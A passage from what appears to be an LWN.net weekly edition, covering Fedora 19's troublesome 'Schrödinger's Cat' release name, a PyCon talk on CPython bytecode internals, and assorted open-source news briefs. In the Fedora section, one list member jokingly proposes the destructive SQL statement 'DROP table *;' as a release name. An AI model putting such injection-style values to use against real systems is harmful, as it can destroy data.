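The heuristic and the suggested replacement are both easy to sketch. The following Python snippet is purely illustrative (libreport itself is written in C, and the function names and thresholds here are made up for the example); it shows why the one-line release file trips the 2% rule even though it is perfectly valid UTF-8:

    def looks_like_text(data, threshold=0.02):
        # Approximation of the heuristic described above: treat the file as
        # binary if more than `threshold` of its bytes fall outside ASCII.
        if not data:
            return True
        high = sum(1 for byte in data if byte > 0x80)
        return high / len(data) <= threshold

    def is_valid_utf8(data):
        # What the bug commenters suggested instead: check the actual encoding.
        try:
            data.decode("utf-8")
            return True
        except UnicodeDecodeError:
            return False

    line = "Fedora release 19 (Schrödinger's Cat)\n".encode("utf-8")
    print(looks_like_text(line))        # False: the two bytes of "ö" push it past 2%
    print(looks_like_text(line, 0.10))  # True with the bumped 10% threshold
    print(is_valid_utf8(line))          # True: the file is perfectly good UTF-8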

Vlasenko did commit a more substantive patch a few days later, but libreport was not the only utility to stumble when it encountered the new release name. Another bug opened by Williamson reported that grub2 also broke when it encountered /etc/os-release, due to the un-escaped single-quote character.

Schrödinger, Schmodinger

On the Fedora development list, Sérgio Basto proposed one change that would solve both problems (and, hopefully, any others stemming from the unusual release name): formally change the release name from "Schrödinger's Cat" to "Schrodingers Cat" or some similar variation that stuck to pure ASCII characters. After all, as Chris Murphy commented, there are likely to be many more utilities that cannot handle the release name, and the project will continue to encounter them as the development cycle progresses.

But, to others, simply changing the release name amounts to "papering over" the real issue, which is ensuring that the build and QA tools can handle arbitrary UTF-8 text. Surely it is better to spend a little time now to fix the issues than to avoid them, the thinking went. Williamson, however, disagreed, calling it "a question of priorities" in light of Fedora's human resources and release schedule. Later, he elaborated that fixing UTF-8 support in the problematic tools in separate branches would be acceptable, if it did not slow down the release:

You want to set up a side project to spin some images with crazy release names and see what breaks and fix that, then you know, go for it. But I'm trying to ship an operating system that works here, and leaving something we know is causing all kinds of problems in the problematic state just so we can keep finding exciting new problems to fix does not suffuse me with joy.

If we have to compromise on just papering it over for Alpha, I mean, _fine_. But seriously: sometimes papering it over is just the right thing to do.

Similarly, Chris Adams pointed out that the deadline for adding new features for Fedora 19 had already passed; adding UTF-8 support to a variety of tools may be important, but there is no doubt that it amounts to a feature. But G.Wolfe Woodbury contended that the real issue was proper internationalization, and that "not defensively programming for such cases is short-sighted."

Solutions and open questions

Jaroslav Reznik opened a Fedora Engineering Steering Committee (FESCo) ticket on the subject, offering two alternatives: fixing UTF-8 and character-handling issues as they arise, or changing the release name to something similar but less problematic (perhaps "Cat of Schroedinger" or the proper German "Schroedingers Katze").

The discussion on the mailing list continued, including mention of the very real risk that after Fedora 18's lengthy delays, the prospect of holding up Fedora 19's release to fix a character string would amount to a terrible public relations blunder. But Peter Jones found a compromise solution and posted a patch changing Schrödinger's Cat to Schrödinger’s Cat in the affected files. The two strings may not look too different (in fact, depending on one's font, they may look identical), but the second replaces the "typewriter apostrophe" character at Unicode code point U+0027 with the "punctuation apostrophe" at U+2019. The typewriter apostrophe is interpreted as a shell quote character, but the punctuation apostrophe is not. Rarely do the differences in Unicode's byzantine slate of similar code points solve more problems than they create—just look at curly- versus straight-quotes in HTML, for example—but in this case, the change allowed /etc/os-release to work once again. FESCo voted to approve the apostrophe change and to fix any other UTF-8 support issues encountered during the development cycle.
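
The practical difference between the two characters is easy to demonstrate from Python, whose shlex module follows shell quoting rules. This snippet is purely illustrative and is not part of any Fedora tooling:

    import shlex

    typewriter = "Fedora release 19 (Schrödinger's Cat)"     # apostrophe is U+0027
    punctuation = "Fedora release 19 (Schrödinger’s Cat)"    # apostrophe is U+2019

    print(shlex.split(punctuation))   # splits cleanly; U+2019 is just another character
    try:
        shlex.split(typewriter)       # U+0027 opens a shell-style quote that never closes
    except ValueError as err:
        print("parse error:", err)    # "No closing quotation"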

Of course, the apostrophe compromise leaves the potential for other UTF-8 support issues to be encountered, and sidesteps the quote-character issue. That bodes well for Fedora 19's release date not getting pushed back due to a last-minute "umlaut bug," but it means less rigorous testing on the release build tools. FESCo subsequently ruled that future release names shall not include "shell metacharacters." That is a practical trade-off; as several list members pointed out, by changing the problematic string, an unknown number of character-handling bugs may go undetected by Fedora—but they could still bite other projects that use the Fedora tools. In the long run, the tools will still need fixing.

In fact, some participants in the mailing list discussion proposed adding non-alphanumeric characters to future release names just to see what happens. Paul Flo Williams predicted someone proposing "Motörhead's Moshpit" as the Fedora 20 release name because of the non-ASCII characters, while Richard M. Jones suggested ☃ (the Unicode "snowman" character U+2603, also known as the HTML character reference &#9731; or &#x2603;). Peter Robinson proposed the project go right for the goal and choose "DROP table *;".

On the other side of the debate, some developers were less than amused. Fedora has had its share of project members who object to release names altogether; Jóhann B. Guðmundsson said:

People wanted to continue to use release names and voted both on that topic and the name.

They also get the benefit of fixing what breaks in the process.

Anti-release-name comments did not elicit much further debate, so it seems likely that release names will hang on for at least one more release cycle. But it is true that "Schrödinger's Cat" caused some problems due to its unpredictable effects on development and release tools. On the whole, though, the problems it revealed are problems worth solving—there is no telling what characters downstream spins and Fedora derivatives might put into a string.

The distribution will be better for catching and correcting assumptions about character encodings and non-alphanumeric strings. Robinson noted that Fedora 19's release name was chosen roughly six months ago, during the Fedora 18 Alpha period; it took that long for anyone to encounter a bug related to it precisely because the problem was so deeply buried. A release name might be a lowly string, primarily chosen for amusement value, but the issue should remind all distributions how subtle such bugs can be, and Fedora clearly stands to benefit now that the cat is out of the bag.

[Special hat tip to Don Marti for proposing "Schrödinger's 😻" as an alternative name. "If you're going to do Unicode, do Unicode."]

Comments (52 posted)

Brief items

Distribution quotes of the week

At this point I have the feeling that Prelink is a cargo cult which we keep around to appease the Airplane Gods.
-- Stephen Smoogen

I'll send another email later, when I have more time, to explain how I feel about email pre-notifications for other emails. The short version: everyone should do those, it's quite helpful to get some advance notice when someone is planning to post an email with content. Then we can be on the lookout for it.
-- Peter Samuelson

Maybe we could at least try to describe the cloud a bit, though? That one looks like a fluffy bunny....
-- Matthew Miller

Comments (none posted)

Scientific Linux 6.4 released

Scientific Linux has announced the release of Scientific Linux 6.4. The release notes have more details.

Comments (none posted)

Ubuntu EOL announcements

Ubuntu has announced the end of support for three versions on May 9: 11.10 (Oneiric Ocelot), 10.04 LTS (Lucid Lynx) Desktop, and 8.04 LTS (Hardy Heron). Ubuntu 10.04 LTS Server will be supported for another two years.

Comments (none posted)

Newsletters and articles of interest

Distribution newsletters

Comments (none posted)

Hands-on with Mozilla’s Web-based “Firefox OS” (ars technica)

Ars technica has a detailed review of a Firefox OS handset. "So Mozilla has succeeded in building an HTML-based platform that allows Mozilla to build apps that 'feel' native. But the much harder task will be to provide third-party developers tools to build apps with the same level of polish and convince them to use them. So far, the Firefox OS app store seems to have few, if any, examples of third-party apps that meet the high bar Mozilla has set for its own apps."

Comments (none posted)

Chakra: A Simple, Strong Energy Center for Your Desktop (LinuxInsider)

LinuxInsider reviews Chakra Linux. "In keeping Chakra a purely simple Linux experience, developers stripped away most of the choice that makes Linux more than a one-size-fits-all desktop -- it only comes in KDEmod. This is a lean KDE desktop without the meta entanglements that contribute to software bloat. Other desktop varieties -- Gnome, Cinnamon, Unity, Xfce and LXDM -- do not exist and will not be added."

Comments (1 posted)

Page editor: Rebecca Sobol

Development

PyCon: Peering in on bytecodes

By Jake Edge
April 3, 2013

While the advertised singing and dancing never materialized, Larry Hastings's PyCon 2013 talk did look at a largely overlooked topic: Python bytecodes. The Python virtual machine (VM) operates on these bytecodes, and Hastings's talk explored what they are and do, how they can be examined, and why folks might be interested. But the talk also featured some concrete uses of bytecodes, including introducing the "simplest possible VM" written in Python, a pure-Python assembler/disassembler, and a Forth interpreter targeting the Python VM.

Hastings is a Python core developer who is also serving as the release manager for Python 3.4. That release is currently targeted for February 2014.

Introduction

[Larry Hastings]

Bytecodes have been used in language implementations going back to the early days of computing. The idea is to turn the input language into a simpler form that can be run on some particular VM. Python bytecodes are an implementation detail specific to CPython (the C language version of Python, which is what most people think of as "Python"); the talk looked at the bytecodes used by CPython 3.3.

The ideas behind bytecode (though not the bytecodes themselves) are roughly applicable to other versions of CPython and to implementations like PyPy (a Python interpreter written in Python). PyPy has bytecodes that are similar but not the same as those of CPython. Implementations like Jython and IronPython have very different bytecodes because the whole point of those is to target a different VM. The concepts behind bytecode will be applicable to all of those, though.

Bytecode is the assembly language for the Python VM, which is "both virtual and a machine", he said. It is virtual in the "sense that it doesn't really exist", it is not something you could "go over and kick". It is a machine, in the sense of a computer, because it has registers and a stack, and bytecode is just the code that operates on that machine.

There are essentially four different kinds of bytecodes in the Python VM. There is a data stack and a set of bytecodes to add and remove items from that stack. There are flow-control bytecodes that allow you to manipulate the instruction pointer to jump forward and backward in the code. The standard arithmetic operations are another set of bytecodes. The final type are the "Pythonic" bytecodes, which do things specific to the language, like creating a tuple or a set.

Any time that Python is running code, it is running bytecode. By definition, everything that is expressible in Python can be turned into bytecode, but the reverse is not true—there are bytecode sequences that are not translatable into valid Python. The reason that Python uses bytecode is to "manage complexity" in implementing the language. It is a common way to implement an interpreted language. Ruby has bytecodes, as does PHP ("although they're crazy ... seriously").

If you are going to be a core contributor, it makes sense to study bytecode, though there are areas of the core where that knowledge is not required at all. Hastings is somewhat skeptical of the other commonly cited reasons—"so I'm really wasting your time"—but the presentation made the subject interesting, even if only as an academic exercise. For example, understanding what's "really going on" in the interpreter is one reason for understanding bytecode, but that's a bit dubious because there is more to it than that. Understanding the bytecode means understanding C, which means understanding assembly language, microcode, transistors, and, eventually, quantum mechanics. You can get really far with Python programming without knowing anything about quantum mechanics, he said.

Hand optimizing bytecode for performance is another commonly cited reason, but there are much better ways to optimize your program and bytecode is somewhat fragile—bytecode can change between Python releases. If you are a pure Python developer, there is one reason to know about bytecode: it is the granularity at which the global interpreter lock (GIL) operates. The interpreter can switch to a different thread between bytecodes, but not in the middle of executing one, so each individual bytecode operation is effectively atomic.
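
As a concrete illustration (an example added here, not one from the talk), disassembling a simple counter increment shows why a statement that looks atomic in source code is not atomic across threads:

    import dis

    counter = 0

    def bump():
        global counter
        counter += 1        # one line of Python, but several bytecodes

    dis.dis(bump)
    # On CPython 3.3 this prints roughly: LOAD_GLOBAL (counter), LOAD_CONST (1),
    # INPLACE_ADD, STORE_GLOBAL (counter), plus the implicit return.  A thread
    # switch can happen between any two of those opcodes, which is why unlocked
    # counter updates from multiple threads can lose increments.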

Disassembling "gunk"

Hastings presented a function called "gunk" that "doesn't do anything useful" but does illustrate some of the attributes of bytecode.

    def gunk(a=1, *args, b=3):
        print(args)
        c = None
        return (a + b, c)

It is a Python-3-only function due to the argument list (and print as a function). It has a positional argument a with a default of 1, args holds the rest of the positional arguments, and b is a keyword-only argument with a default of 3. The function prints the args tuple, sets local variable c, and returns a tuple. Its bytecode can be examined using the dis (disassembler) module:
    >>> import dis
    >>> dis.dis(gunk)
      2           0 LOAD_GLOBAL              0 (print)
		  3 LOAD_FAST                2 (args)
		  6 CALL_FUNCTION            1 (1 positional, 0 keyword pair)
		  9 POP_TOP

      3          10 LOAD_CONST               0 (None)
		 13 STORE_FAST               3 (c)

      4          16 LOAD_FAST                0 (a)
		 19 LOAD_FAST                1 (b)
		 22 BINARY_ADD
		 23 LOAD_FAST                3 (c)
		 26 BUILD_TUPLE              2
		 29 RETURN_VALUE

Bytecode consists of a single-byte operation code (opcode) followed by an optional two-byte parameter. Thus, bytecodes are either one or three bytes in length. The first column in the disassembly shows the source line number, the second is the address of the opcode (i.e. the sum of the sizes of the previous bytecodes), third is the opcode itself, fourth is the opcode's parameter, and last is an interpretation of that parameter.

The output from dis leaves something to be desired, he said. For example "0" turns into "print" somehow, but dis doesn't explain it. Nor does it show the defaults of the arguments, or make a distinction between arguments and local variables. All of that led Hastings to write his own assembler/disassembler, which he described at the end of the talk.

There are 101 different opcodes in Python 3.3. The dis.HAVE_ARGUMENT constant (currently 90) governs whether a given opcode has an argument or not. If the opcode is less than that value, it has no argument, and is one byte in size.

Bytecode requires a runtime environment, which is provided by the Python VM. The VM has three types of data associated with it, each of which can be manipulated by various opcodes. The first is the instruction pointer, which can be changed with JUMP_* opcodes. The stack is another piece of data the VM keeps track of. Various opcodes like LOAD_* or STORE_* directly add or remove things from the stack, but there are also opcodes to do rotations and other manipulations. The final data storage location for the VM is the "fast locals array", which stores arguments and local variables; the LOAD_FAST and STORE_FAST opcodes are used to access items in that array.

The stack is used to store arbitrary Python objects. The LOAD_* opcodes push something onto the stack, while the STORE_* opcodes remove things from the top. The BINARY_ADD opcode takes the top two objects off the stack, "adds" them (which might not mean addition depending on the types) and loads the result back onto the stack.

There are six different variable types that are used in the VM and which can be moved to or from the stack with the load and store opcodes. Globals and builtins are loaded with LOAD_GLOBAL, while the fast locals array is accessed with LOAD_FAST. There is a "slow locals" array, which was the original mechanism used for arguments and local variables, but is now used for class and module variables with the LOAD_NAME opcode. Constants use LOAD_CONST, while object attributes use LOAD_ATTR. For all except CONST, there is a corresponding STORE_* opcode.
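
A quick way to see several of these load opcodes side by side is to disassemble a small function that touches a global, an attribute, a local, and a constant (an example added here, not from the talk; the exact output varies between CPython versions):

    import dis
    import math

    def circumference(r):
        # 2: LOAD_CONST, math: LOAD_GLOBAL, pi: LOAD_ATTR, r: LOAD_FAST
        return 2 * math.pi * r

    dis.dis(circumference)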

The last variable type is "cell variables" that use the LOAD_DEREF opcode. Cell variables are local variables that are referenced by a nested function, so that function must look for them in an enclosing scope. In the following, a is a cell variable in foo() (and a "free" variable in bar()).

    def foo():
        a = 1
        def bar():
            print(a)

It is not clear to Hastings why cell variables are handled that way, but they are.
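
The cell machinery is visible in the code objects themselves. A slight variation on the example above, returning the inner function so that it can be inspected (added here for illustration), shows where the names end up:

    import dis

    def foo():
        a = 1
        def bar():
            print(a)
        return bar

    print(foo.__code__.co_cellvars)    # ('a',): a lives in a cell in foo
    print(foo().__code__.co_freevars)  # ('a',): bar sees it as a free variable
    dis.dis(foo())                     # bar loads a with LOAD_DEREF, not LOAD_FAST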

Rooting around in code objects

Looking deeper inside the gunk() object shows that its type is types.FunctionType, but that it contains a code object (gunk.__code__, which is types.CodeType). One thing to note: when talking about various double-underscore names (like __code__), it is evidently traditional in the Python community to use "dunder" to describe them. So while viewing the video of Hastings's talk, or others from PyCon, you will hear things like "dunder code" for __code__.

But if every function object contains a code object, "why have both?", Hastings asked. Code objects must be able to be handled by the marshal binary serialization format, which is conceptually similar to pickle. Marshal is used to create .pyc files. In fact, a .pyc is just three four-byte integers (magic number, datestamp and size of the .py file) followed by a marshaled code object. But function objects contain lots of "extras" that cannot be marshaled (and may not even be pickle-able).

While all of that is true, Hastings asked Python creator Guido van Rossum about the reason for having both kinds of objects a few days before the talk. Van Rossum said that the decision predates marshal and .pyc files, and was originally done to support nested functions so that the code object could be shared by multiple instantiations of the enclosing function. That saves time and memory.
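
Given that layout, pulling the code object back out of a .pyc is straightforward. The sketch below assumes the Python 3.3-era header described above (three four-byte fields before the marshal data); later versions add more header fields, marshal data can only be read by the same Python version that wrote it, and the file name here is hypothetical:

    import dis
    import marshal

    with open("__pycache__/gunk.cpython-33.pyc", "rb") as f:   # hypothetical path
        magic = f.read(4)                # magic number identifying the bytecode version
        mtime = f.read(4)                # timestamp of the .py source
        size = f.read(4)                 # size of the .py source
        code = marshal.loads(f.read())   # the module-level code object

    dis.dis(code)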

To get to the actual bytecode of gunk(), you need to look at the co_code attribute:

    >>> gunk.__code__.co_code
    b't\x00\x00|\x02\x00\x83\x01\x00\x01d\x00\x00}\x03\x00|\x00\x00|\
    \x01\x00\x17|\x03\x00f\x02\x00S' 

or, slightly more readably:
    >>> [x for x in gunk.__code__.co_code]
    [116, 0, 0, 124, 2, 0, 131, 1, 0, 1, 100, 0, 0, 125, 3, 0, 124, 0, 0, 124,
    1, 0, 23, 124, 3, 0, 102, 2, 0, 83]

He showed the "simplest useful disassembler", which fit on a single slide. It would simply turn the opcode byte into a name and print its argument (if any) as an integer. Running it on itself gives "almost readable" output, he said, which is 80% of what dis.dis() does but in only 15 lines of code.
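
That slide is not reproduced here, but a disassembler in the same spirit is easy to sketch. The version below assumes the pre-3.6 bytecode layout described above (a one-byte opcode optionally followed by a two-byte little-endian argument) and will not work on newer CPython releases, which use a fixed-width "wordcode" format:

    import dis

    def simple_dis(code):
        bytecode = code.co_code
        i = 0
        while i < len(bytecode):
            op = bytecode[i]
            if op >= dis.HAVE_ARGUMENT:
                # a two-byte, little-endian argument follows the opcode
                arg = bytecode[i + 1] | (bytecode[i + 2] << 8)
                print("%4d %-20s %d" % (i, dis.opname[op], arg))
                i += 3
            else:
                print("%4d %s" % (i, dis.opname[op]))
                i += 1

    simple_dis(gunk.__code__)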

Digging around in the code object further, Hastings showed other co_* attributes on gunk.__code__. There are counts of various kinds of arguments (positional, keyword-only) to the function and a count of the fast locals along with an array of their names ('a', 'b', 'args', and 'c', for gunk()). It also contains the arrays referred to in the parameters to opcodes. For example gunk.__code__.co_names contains the global and builtin names used in the function ('print'), while co_consts has a tuple with the constants (just None here, which the LOAD_CONST in the disassembly above refers to). Beyond that, there is information on line numbers, filename, module name, maximum stack depth, and on and on.
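
Poking at those attributes directly shows the same information (the values shown are what CPython 3.3 produces for gunk(); the set of co_* attributes has grown in later releases):

    code = gunk.__code__
    print(code.co_argcount, code.co_kwonlyargcount)  # 1 1: positional and keyword-only counts
    print(code.co_nlocals, code.co_varnames)         # 4 ('a', 'b', 'args', 'c')
    print(code.co_names)                             # ('print',)
    print(code.co_consts)                            # (None,)
    print(code.co_filename, code.co_firstlineno, code.co_stacksize)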

Modules and classes

A function is just a def statement followed by some code (which gets turned into a code object). A module in Python is just a bunch of code without the def; it also gets turned into a code object. There are no arguments to the module and it effectively ends with a "return None" since all code objects must return.
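
The implicit return is easy to see by compiling a tiny module by hand (an illustration added here, not from the talk):

    import dis

    module_code = compile("x = 1\nprint(x)\n", "<demo-module>", "exec")
    dis.dis(module_code)
    # Module-level names use STORE_NAME/LOAD_NAME (the "slow locals"), and the
    # last two instructions are LOAD_CONST (None) and RETURN_VALUE: even a
    # module "returns None" when its code object finishes.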

Classes are a bit more interesting, Hastings said. The "slow" locals dictionary is passed as the argument to the classname callable object. That is something that is new with Python 3 and it allows the __prepare__() method to substitute its own dictionary-like object in place of the __locals__ dictionary. That is all done in support of metaclass handling for Python.

Creating a function by hand is easy to do, with only four lines of code, Hastings said, "but they're four lines that you're not going to like". There is a lot of magic in that slide that creates an add() function, but the three slides following show how to do so in a more readable form. But, even that is not "terribly readable", which is why he wrote his own assembler.
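
Those slides are not reproduced here, but the underlying point, that a function object is little more than a code object bundled with a globals dictionary and a name, can be sketched with the types module (an illustration, not the construction from the talk):

    import types

    def template(a, b):
        return a + b

    # Build a brand-new function object that reuses template's code object.
    add = types.FunctionType(template.__code__, globals(), "add")
    print(add(2, 3))                           # 5
    print(add.__code__ is template.__code__)   # True: one code object, two functions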

The holy hand grenade

His assembler project, named "Maynard" after the keeper of the "holy hand grenade" ("the most effective disassembler known to man or beast"), includes both an assembler and disassembler. The Maynard repository also contains the sample code from his talk. Its output is "far more readable" when applied to gunk() for example. His eventual goal with Maynard is to make it "round-trippable", so that you could disassemble a function, then assemble the result, and get the function back again. It's close, but not there yet.

Hastings then presented "another terrible idea of mine", which is Perth—a Forth interpreter on top of the CPython VM. It is "really a toy" that does not (yet) implement recursion. That will change, though, as he will not consider it done until it can run the Fibonacci number algorithm. "You don't have a real language until you can run Fibonacci", he said. The biggest hurdle he has faced is that the Python stack operations do not allow deep stack manipulations, which leads to some terribly inefficient workarounds for a stack-based language like Forth.

Finally, for his last trick, Hastings presented a five-slide "simplest possible VM" that could nevertheless run fib(). It is a Python VM written completely in Python, which is not "very robust"; it works for that particular function "and nothing else".
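
His VM is not reproduced here, but the flavor of such an interpreter can be conveyed in a few lines. The sketch below handles just enough opcodes to run a trivial function, again assuming the pre-3.6 one-or-three-byte bytecode format discussed earlier; anything unexpected simply raises an error:

    import dis

    def tiny_vm(func, *args):
        code = func.__code__
        fast = list(args)            # the fast locals array
        stack = []                   # the data stack
        raw = code.co_code
        i = 0
        while i < len(raw):
            op = raw[i]
            if op >= dis.HAVE_ARGUMENT:
                arg = raw[i + 1] | (raw[i + 2] << 8)
                i += 3
            else:
                arg = None
                i += 1
            name = dis.opname[op]
            if name == "LOAD_FAST":
                stack.append(fast[arg])
            elif name == "LOAD_CONST":
                stack.append(code.co_consts[arg])
            elif name == "BINARY_ADD":
                right = stack.pop()
                stack.append(stack.pop() + right)
            elif name == "RETURN_VALUE":
                return stack.pop()
            else:
                raise NotImplementedError(name)

    def add(a, b):
        return a + b

    print(tiny_vm(add, 2, 3))        # 5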

If you play with bytecode, Hastings said, there is "something you should expect to see a lot":

    segmentation fault (core dumped)

The Python VM makes no guarantees that it will be robust in the face of badly formed bytecode—it is "very easy to crash". For those wanting more information, the ceval.c file in the Python source tree is the canonical location for the bytecodes, but requires knowledge of C. Hastings also pointed to Ned Batchelder's byterun, which is a pure Python implementation of a bytecode-executing VM.

Interpreted languages provide introspection opportunities that go well beyond just the data structures and objects in the program. There is something rather interesting in being able to root around inside the execution environment of a language like Python. One practical benefit of learning about Python's bytecodes that Hastings didn't mention is that it provides a view into the implementation of an interpreted language. That's certainly of more than simply academic interest.

Comments (9 posted)

Brief items

Quotes of the week

Now open-source is about seeing the sausage making process, you get to see all the bits of stuff you don't want to think go into the sausages, you have to face a lot more truth, and you have to be willing to stand up against things without mummy manager to back you up. You can't have all the nice benefits of open-source development without having the bad side, the public blowups and discussion, it just can't work like that. If we take all those discussions to private lists or emails, where do you draw the line, are the people on that private list some sort of shadowy cabal overlords? Do you want an open-source development model that isn't public?
-- David Airlie

You're never alone on a project. There's you and the future-you trying to figure out what you did just now.
-- Christophe Michel (via retweet by Joe Brockmeier)

But, the work never slows and the list of things to do only gets longer, and it can be hard to find the time to go back to everything that isn’t currently on fire or in dire need of upgrading and make sure all of the boxes are properly ticked.

So think carefully about the things that are most important to your project. Double check what you think you’ve done, and ensure that it matches what you have actually done. If your list of things to do only gets longer, you might as well let it grow – it will anyways – and turn a critical eye backwards.

-- Jeff Mitchell

Comments (none posted)

Yorba crowdfunding Geary development

Back in August 2012, Yorba Foundation founder Adam Dingle spoke at GUADEC about the complexities of crowdfunding development for open source applications. This week, the group officially launched a campaign at IndieGoGo to underwrite development of its open source email client Geary. The target is US $100,000, which, as executive director Jim Nelson explains, is a number chosen to support three full-time developers for the next release cycle. "I doubt there’s a widely-used desktop application out there developed for less than US$100,000 — it’s just that the price tag might be hidden from its users." The campaign runs for one month; among the many factors Dingle spoke of that differentiate between funding sites, IndieGoGo only distributes funds if the target is met.

Comments (29 posted)

MATE 1.6 released

Version 1.6 of the MATE desktop environment is available. "This release is a giant step forward from the 1.4 release. In this release, we have replaced many deprecated packages and libraries with new technologies available in GLib. We have also added a lot of new features to MATE." See the announcement for a list of those new features.

Comments (2 posted)

Twisted 13.0.0 is available

Version 13.0.0 of the Twisted development framework has been released. Highlighted changes include documentation improvements, support for Unicode domain names (after a regression in 12.3) and security fixes.

Full Story (comments: none)

Mozilla and Samsung building a new browser engine

The Mozilla project has announced a collaboration with Samsung to build "Servo", a next-generation browser rendering engine. "Servo is an attempt to rebuild the Web browser from the ground up on modern hardware, rethinking old assumptions along the way. This means addressing the causes of security vulnerabilities while designing a platform that can fully utilize the performance of tomorrow’s massively parallel hardware to enable new and richer experiences on the Web. To those ends, Servo is written in Rust, a new, safe systems language developed by Mozilla along with a growing community of enthusiasts."

Comments (65 posted)

Google's "Blink" rendering engine

Google has announced that it is forking the WebKit rendering engine to make a new project called Blink. "Chromium uses a different multi-process architecture than other WebKit-based browsers, and supporting multiple architectures over the years has led to increasing complexity for both the WebKit and Chromium projects. This has slowed down the collective pace of innovation - so today, we are introducing Blink, a new open source rendering engine based on WebKit."

Comments (37 posted)

Newsletters and articles

Development newsletters from the past week

Comments (none posted)

A look at C++14, part 1

The "Meeting C++" blog looks at some proposed changes to the C++ language to be considered in April. "It is proposed to add a library for pipelines to the C++ Standard, that such a pipeline could be implemented in C++ as such:
    (pipeline::from(input_queue) |
      bind(grep, "^Error") |
      bind(vgrep, "test@example.com") |
      bind(sed, "'s/^Error:.*Message: //") |
      output_queue).run(&threadpool);

Comments (79 posted)

A look at C++14: Papers Part 2

Here's the second part in the C++14 papers series on the "Meeting C++" site. "A proposal for Executors, objects that can execute units of work packaged as function objects. So this is another possible approach to task based parallelism, where the executor object is used as a reusable thread, that can handled a queue of tasks. One possible implementation of an executor is a thread-pool, but other implementations are possible."

Comments (13 posted)

A look at C++14 and beyond: Papers part 3

Part 3 of the "Meeting C++" papers series on C++14 is available. "The concepts approach for C++11 failed, it was dropped, as it was to complex to be adopted fully to the standard for C++11. Since then a lot of people have had their thoughts on how to integrate concepts into the language, as its a feature that would enhance C++ for sure. This proposal now concentraits on template constraints, which shall be applied to force the correctness of template use, not definition."

Comments (8 posted)

What is Open Source Cloud? (Linux.com)

Over at Linux.com, Joe "Zonker" Brockmeier, community evangelist for CloudStack at Citrix, tries to disambiguate the term "cloud". He describes the attributes of clouds, using the US National Institute of Standards and Technology (NIST) definition of cloud computing, looks at the various "X as a service" offerings, how it all works, and why it's important to have open clouds. "Having an open cloud matters because we need to be able to continue the work that GNU and Linux folks have been doing for more than twenty years, at scale. It matters because we need the cloud to be bigger than Amazon or proprietary companies – and because users and organizations should have as much control over their computing destiny at scale as they have had on individual servers."

Comments (3 posted)

McIntyre: Scanning for assembly code in Free Software packages

On his blog, Steve McIntyre writes about work he has been doing to identify assembly code in Linux packages:

In the Linaro Enterprise Group, my task for the last several weeks was to work through a huge number of packages looking for assembly code. Why? So that we could identify code that would need porting to work well on AArch64, the new 64-bit execution state coming to the ARM world Real Soon Now.

Working with some Ubuntu and Fedora developers, we generated a list of packages included in each distribution that seemed to contain assembly code of some sort. Then I worked through that list, checking to see:

  1. if there was actually any assembly there;
  2. if so, what it was for, and
  3. whether it was actually used

That work resulted in a report with his findings.

Comments (30 posted)

Page editor: Nathan Willis

Announcements

Brief items

Google: Taking a stand on open source and patents

Google has announced an initiative to help protect open source software from patent claims. "Today, we’re taking another step towards that goal by announcing the Open Patent Non-Assertion (OPN) Pledge: we pledge not to sue any user, distributor or developer of open-source software on specified patents, unless first attacked. We’ve begun by identifying 10 patents relating to MapReduce, a computing model for processing large data sets first developed at Google—open-source versions of which are now widely used. Over time, we intend to expand the set of Google’s patents covered by the pledge to other technologies."

Comments (12 posted)

Red Hat and Rackspace face down a patent troll

Red Hat and Rackspace Hosting have announced that they have won the dismissal of a patent suit by Uniloc USA. Uniloc was asserting patent #5,892,697, which relates to the handling of floating-point numbers. "In dismissing the case, Chief Judge Leonard Davis found that Uniloc's claim was unpatentable under Supreme Court case law that prohibits the patenting of mathematical algorithms. This is the first reported instance in which the Eastern District of Texas has granted an early motion to dismiss finding a patent invalid because it claimed unpatentable subject matter."

Update: see Groklaw for analysis and the text of the decision.

Comments (6 posted)

Subsurface mourns Jan Schubert

The Subsurface project mourns the loss of Jan Schubert. "It is with great sadness that we say a final 'Tschüss' to one of our most active and engaging developers. Without Jan, Subsurface would not support the needs of technical divers the way it does today."

Comments (none posted)

Articles of interest

Baker: Celebrating 15 Years of a Better Web

Mitchell Baker looks back at Mozilla's first 15 years and ponders the years to come as well. "In the coming era both the opportunities and threats to the Web are just as big as they were 15 years ago. As the role of data grows and device capabilities expand, the Internet will become an even more central part of our lives. The need for individuals to have some control over how this works and what we experience is fundamental. Mozilla can — and must — play a key role again. We have the vision, the products and the technology to do this. We know how to enable people to participate, both by contributing to our specific activities and coming up with their own ideas that advance the bigger cause of enriching the Web."

Comments (none posted)

Free Software Supporter -- Issue 60

The March edition of the Free Software Foundation's newsletter is out. Topics include Hollyweb, LibrePlanet, Google and instant messaging, unlocking cell phones, an interview with Adam Hyde, Free Software Award winners, the DRM-free label, Document Freedom Day, Trisquel, and more.

Full Story (comments: none)

FSFE: How to break free from Skype

The Free Software Foundation Europe notes that Microsoft will discontinue its Windows Messenger service and switch current users to Skype. "The Free Software Foundation Europe advises former users of Windows Messenger to take this as an opportunity to embrace Open Standards such as Jabber (XMPP) instead of switching to Skype."

Full Story (comments: 2)

How crowdfunding and the JOBS Act will shape open source companies (O'Reilly)

This O'Reilly Radar post makes the case that upcoming changes in how shares of companies can be sold in the US will facilitate the creation of a new flood of open-source companies. "Now, open source projects will be able to seek and find crowds of investors from within their own communities. These companies will have both the traditional advantages of proprietary companies (well-capitalized companies recruit armies of competent programmers and sales forces that can survive long sales cycles) and the advantages of the open source development model (open code review and the ability to integrate the insights of outsiders)."

Comments (1 posted)

Calls for Presentations

Call for papers for Dyla'13

Dyla'13, the 7th Workshop on Dynamic Languages and Applications, will take place July 1-5 in Montpellier, France. The submission deadline is April 19.

Full Story (comments: none)

GUADEC 2013 Call for Presentations

The GNOME Users and Developers Conference GUADEC will take place August 1-8, in Brno, Czech Republic. The call for presentations is open until April 27.

Full Story (comments: none)

Extended CfP at PyCon SG 2013

PyCon SG will take place June 13-15 in Singapore. The call for proposals, presentations and tutorials has been extended until April 30.

Full Story (comments: none)

openSUSE Conference 2013 Call for Papers

The openSUSE Conference takes place July 18-22 in Thessaloniki, Greece. The CfP deadline has been extended to June 17 or until all slots are filled.

Comments (none posted)

Upcoming Events

PyCon Australia 2013 Early Bird registration

Early bird registration for PyCon Australia is open. PyCon AU takes place July 5-7 in Hobart, Tasmania. Early bird registration will be extended to the first 80 confirmed conference registrations, or until May 3, whichever comes first.

Full Story (comments: none)

PostgreSQL Conference Europe 2013

PGConf.EU 2013 will be held October 29-November 1 in Dublin, Ireland. "The format will be the same as previous years - one day of training before the main event consisting of three days fully packed with sessions about PostgreSQL."

Full Story (comments: none)

Events: April 4, 2013 to June 3, 2013

The following event listing is taken from the LWN.net Calendar.

